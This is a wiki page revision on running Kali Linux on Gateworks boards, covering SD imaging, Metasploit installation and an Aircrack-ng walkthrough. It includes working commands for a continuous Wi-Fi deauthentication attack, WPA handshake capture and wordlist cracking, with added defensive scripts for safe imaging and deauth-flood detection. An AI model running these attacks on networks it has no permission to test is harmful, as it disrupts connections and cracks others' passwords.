Changes between Initial Version and Version 1 of Kali

07/06/2021 11:30:16 PM (17 months ago)
Cale Collins

first draft, no pics


= Kali

Official Kali Linux images are now provided by [ Offensive Security] for both Ventana and Newport.

Build scripts can be found here:

* [ Ventana]
* [ Newport]
* Create your own - [ kali-linux-arm-chroot]

The Ventana prebuilt image can be downloaded from [ here], under ARM images > Gateworks.

**Note: Official images use Gateworks kernel repos.**

== What is Kali

Kali Linux (formerly known as !BackTrack Linux) is an open-source, Debian-based Linux distribution aimed at advanced penetration testing and security auditing. Kali Linux contains several hundred tools targeted towards various information security tasks, such as penetration testing, security research, computer forensics and reverse engineering. Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists.

Kali Linux was released on 13 March 2013 as a complete, top-to-bottom rebuild of !BackTrack Linux, adhering completely to Debian development standards.

Reference: []

= Kali on Gateworks

Official instructions:

* [ Official Page]

The following instructions can be used on Ventana or Newport family boards.

Requirements:

* 16GB SD card or larger (Class 10 recommended)
* Gateworks SBC Ventana or Newport
* Linux desktop workstation
* Wireless radio capable of packet injection ([wiki:/wireless/wifi#Wifi-6 Alfa AWPCIE-AX200U] recommended)
* Antennas

== Installing Kali to an SD card

Insert the SD card into the Linux workstation, then use "dmesg" to check the device name udev has assigned, for example "/dev/sdb".

Some operating systems auto-mount block storage devices; the partitions must be unmounted in order to write directly to the volume:

{{{
umount /dev/sdb?
}}}

Write the image to the SD card:

{{{
xzcat kali-linux-1-newport.img.xz | sudo dd of=/dev/sdb bs=4M status=progress
}}}

The card is now imaged with Kali. Because the partitions have already been unmounted, simply remove the card.
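
The imaging steps above trust the operator to type the right device name, and a dd to the wrong disk is unrecoverable. The script below is an added example, not part of the Gateworks wiki: it wraps the same umount and xzcat | dd steps with a whole-disk name check, a sysfs removable check, a sync, and a read-back comparison of the first MiB. The function names, the FORCE override and the /tmp/img-head.bin path are my own choices.

```shell
#!/bin/sh
# Added example (not from the Gateworks wiki): a guarded version of the
# "umount /dev/sdb?" and "xzcat ... | dd of=/dev/sdb" steps above.
# Assumes a Linux workstation with xz, GNU dd, cmp and sudo.

# Accept only a whole-disk name (never a partition such as /dev/sdb1).
is_whole_disk() {
    case "$1" in
        /dev/sd[a-z]|/dev/sd[a-z][a-z]|/dev/mmcblk[0-9]|/dev/nvme[0-9]n[0-9]) return 0 ;;
        *) return 1 ;;
    esac
}

# Sysfs flags USB card readers as removable (1); a system disk reports 0.
# Some built-in SD readers also report 0, hence the FORCE=1 override below.
is_removable() {
    [ "$(cat "/sys/block/$(basename "$1")/removable" 2>/dev/null)" = "1" ]
}

# Unmount any partition of the device that the desktop auto-mounted.
unmount_partitions() {
    for part in "$1"?*; do
        [ -e "$part" ] || continue
        if grep -q "^$part " /proc/mounts; then
            sudo umount "$part" || return 1
        fi
    done
}

# write_image kali-linux-1-newport.img.xz /dev/sdb
write_image() {
    img=$1; dev=$2
    is_whole_disk "$dev" || { echo "refusing: $dev is not a whole disk" >&2; return 1; }
    [ "${FORCE:-0}" = 1 ] || is_removable "$dev" || { echo "refusing: $dev is not flagged removable (FORCE=1 to override)" >&2; return 1; }
    [ -r "$img" ] || { echo "cannot read $img" >&2; return 1; }
    unmount_partitions "$dev" || return 1
    xzcat "$img" | sudo dd of="$dev" bs=4M status=progress || return 1
    sync    # flush the page cache before the card is pulled
    # Read back the first MiB and compare it with the image to catch a write
    # that silently failed or went to a write-protected card.
    xzcat "$img" | head -c 1048576 > /tmp/img-head.bin
    if sudo dd if="$dev" bs=1M count=1 2>/dev/null | cmp -s - /tmp/img-head.bin; then
        echo "first MiB of $dev matches $img"
    else
        echo "read-back mismatch on $dev" >&2; return 1
    fi
}
```

Run it as `write_image kali-linux-1-newport.img.xz /dev/sdb` after sourcing the file; the read-back only checks the first MiB, so a full verification still means comparing the whole image.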
== Booting the SD card

To boot from the SD card reader, "boot_targets" (Newport) or "bootdevs" (Ventana) needs to be set in the bootloader so the SD card has priority over the flash.

Break into the bootloader (interrupt autoboot to get a prompt), then:

For Newport:

{{{
GW6204-B> setenv boot_targets mmc1 mmc0 usb0 scsi0
GW6204-B> saveenv
}}}

For Ventana:

{{{
Ventana > setenv bootdevs mmc
Ventana > print bootdevs
Ventana > saveenv
Saving Environment to NAND...
Erasing NAND...
Erasing at 0x1000000 -- 100% complete.
Writing to NAND... OK
Ventana >
}}}

Reboot the SBC.

Once Kali has booted, log in with username "kali" and password "kali".

Verify that your network interfaces are available:

{{{
ls /sys/class/net
}}}

Check that your radio supports the channels that will be used:

{{{
iw phy phy0 channels
}}}

= Install Metasploit Framework

Metasploit Framework is an open-source tool that can be used to probe for vulnerabilities on networks and servers.

Metasploit features:
* Command shell payloads that enable users to run scripts or arbitrary commands against a host
* Dynamic payloads that allow testers to generate unique payloads to evade antivirus software
* Meterpreter payloads that allow users to commandeer device monitors using VNC and to take over sessions or upload and download files
* Static payloads that enable port forwarding and communications between networks

Offensive Security offers a free online course for learning Metasploit: []

To install Metasploit on Gateworks:

1. Update your system
{{{
sudo apt-get update
}}}
1. Install curl
{{{
sudo apt-get install curl -y
}}}
1. Download and install Metasploit
{{{
curl > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
}}}

= Aircrack-ng

Aircrack-ng is a complete suite of tools to assess !WiFi network security.

It focuses on different areas of !WiFi security:
* Monitoring: packet capture and export of data to text files for further processing by third-party tools
* Attacking: replay attacks, deauthentication, fake access points and others via packet injection
* Testing: checking !WiFi cards and driver capabilities (capture and injection)
* Cracking: WEP and WPA PSK (WPA 1 and 2)

Reference: []

For deauthentication the Wi-Fi adapter needs to be capable of packet injection.

To test whether packet injection is available:

{{{
sudo aireplay-ng --test wlan0mon
}}}

== Capturing packets

airmon-ng is used to create a monitor-mode interface for packet capture.

To begin, connect to the board using SSH (a second SSH session will be needed later).

Kill processes that may interfere with airmon-ng:

{{{
sudo airmon-ng check kill
}}}

Start the monitor interface:

{{{
sudo airmon-ng start wlan0   # creates the monitor interface "wlan0mon"
}}}

Kick off airodump-ng to start capturing packets. Note that airodump-ng by default only monitors 2.4 GHz; use the "--band a" switch to enable 5 GHz monitoring.

{{{
sudo airodump-ng --band a wlan0mon
}}}

== Hacking the Gibson

Once the target SSID has been identified, record its MAC address (BSSID) and note which channel it is on.

Single out that network to find clients which can be deauthenticated. In this example my BSSID is {{{11:22:33:44:55:66}}} on channel 44. We will create a log file to record the handshake called "my-handshake".

{{{
sudo airodump-ng -c44 --write my-handshake --bssid 11:22:33:44:55:66 wlan0mon
}}}

Run this scan until a client is identified. For this example I've used my cell phone MAC {{{77:88:99:AA:BB:CC}}}.

Start a new SSH session, so both sessions are open simultaneously.

In the second session execute the deauthentication attack (this is where packet injection is used):

{{{
sudo aireplay-ng --deauth 0 -a 11:22:33:44:55:66 -c 77:88:99:AA:BB:CC wlan0mon
}}}

On success the client is disconnected from the access point. When the client reconnects, airodump-ng captures the handshake and logs it to the designated file.
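
From the defender's side, the burst of deauthentication frames that the step above generates is easy to spot in a capture of the same channel. The awk filter below is an added example, not part of the wiki page: it reads lines in the style of "tcpdump -e -i wlan0mon" (the field labels BSSID:, DA: and DeAuthentication: are an assumption about tcpdump's 802.11 output format) and alerts when one BSSID/client pair sees THRESHOLD or more deauth frames within WINDOW seconds. The sample capture is constructed and reuses the addresses from the example above, written in the lowercase hex tcpdump prints.

```shell
#!/bin/sh
# Added example (not from the Gateworks wiki): flag deauthentication floods
# in a text capture. Input lines follow the style of "tcpdump -e -i wlan0mon"
# (the exact tcpdump field layout is an assumption). Alerts when one BSSID
# sends THRESHOLD or more deauth frames to one client within WINDOW seconds.

# detect_deauth_flood THRESHOLD WINDOW_SECONDS < capture.txt
detect_deauth_flood() {
    awk -v thr="$1" -v win="$2" '
    /DeAuthentication/ {
        split($1, t, ":")                     # HH:MM:SS.ffffff -> seconds
        ts = t[1] * 3600 + t[2] * 60 + t[3]
        bssid = ""; da = ""
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^BSSID:/) bssid = substr($i, 7)
            else if ($i ~ /^DA:/) da = substr($i, 4)
        }
        if (bssid == "" || da == "") next
        key = bssid SUBSEP da
        n[key]++; stamp[key, n[key]] = ts
        c = 0                                 # frames for this pair inside the trailing window
        for (j = n[key]; j >= 1 && ts - stamp[key, j] <= win; j--) c++
        if (c >= thr && !(key in flagged)) {
            flagged[key] = 1
            printf "ALERT %s: %d deauth frames from %s to %s within %ss\n", $1, c, bssid, da, win
        }
    }'
}

# Constructed sample: one beacon, a five-frame burst against the client from
# the section above, and a single unrelated deauth that must not alert.
sample_capture() {
    cat <<'EOF'
12:00:00.100000 6.0 Mb/s 5220 MHz 11a -38dBm signal BSSID:11:22:33:44:55:66 DA:ff:ff:ff:ff:ff:ff SA:11:22:33:44:55:66 Beacon (ExampleNet) ESS CH: 44
12:00:01.000100 1.0 Mb/s 5220 MHz 11a -40dBm signal BSSID:11:22:33:44:55:66 DA:77:88:99:aa:bb:cc SA:11:22:33:44:55:66 DeAuthentication: Class 3 frame received from nonassociated station
12:00:01.000900 1.0 Mb/s 5220 MHz 11a -40dBm signal BSSID:11:22:33:44:55:66 DA:77:88:99:aa:bb:cc SA:11:22:33:44:55:66 DeAuthentication: Class 3 frame received from nonassociated station
12:00:01.001700 1.0 Mb/s 5220 MHz 11a -40dBm signal BSSID:11:22:33:44:55:66 DA:77:88:99:aa:bb:cc SA:11:22:33:44:55:66 DeAuthentication: Class 3 frame received from nonassociated station
12:00:01.002500 1.0 Mb/s 5220 MHz 11a -40dBm signal BSSID:11:22:33:44:55:66 DA:77:88:99:aa:bb:cc SA:11:22:33:44:55:66 DeAuthentication: Class 3 frame received from nonassociated station
12:00:01.003300 1.0 Mb/s 5220 MHz 11a -40dBm signal BSSID:11:22:33:44:55:66 DA:77:88:99:aa:bb:cc SA:11:22:33:44:55:66 DeAuthentication: Class 3 frame received from nonassociated station
12:00:07.500000 1.0 Mb/s 5220 MHz 11a -55dBm signal BSSID:11:22:33:44:55:66 DA:de:ad:be:ef:00:01 SA:11:22:33:44:55:66 DeAuthentication: Previous authentication no longer valid
EOF
}

# 5 frames inside 2 s trips the alert exactly once, for 77:88:99:aa:bb:cc.
sample_capture | detect_deauth_flood 5 2
```

A real deployment would feed the live tcpdump output into the same function and tune THRESHOLD and WINDOW to the network's normal roaming behaviour.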
=== Wordlists and Aircrack-ng

Wordlists with default manufacturer passwords are provided by Metasploit Framework. More wordlists can be found in "/usr/share/wordlists". A wordlist is only one potential approach to breaking the handshake hash. Because it is the simplest, we use this method in the following example.

An all-round basic wordlist included with Kali is rockyou.txt.

{{{
sudo gunzip /usr/share/wordlists/rockyou.txt.gz   # extract the wordlist
cat /usr/share/wordlists/rockyou.txt               # display the words contained in the list
}}}

Kick off aircrack-ng to try the wordlist against the captured handshake:

{{{
aircrack-ng my-handshake-01.cap -w /usr/share/wordlists/rockyou.txt
}}}

= Getting help with Kali

Please direct all Kali Linux related questions to the forums:

Feel welcome to contact ! for questions specific to Gateworks.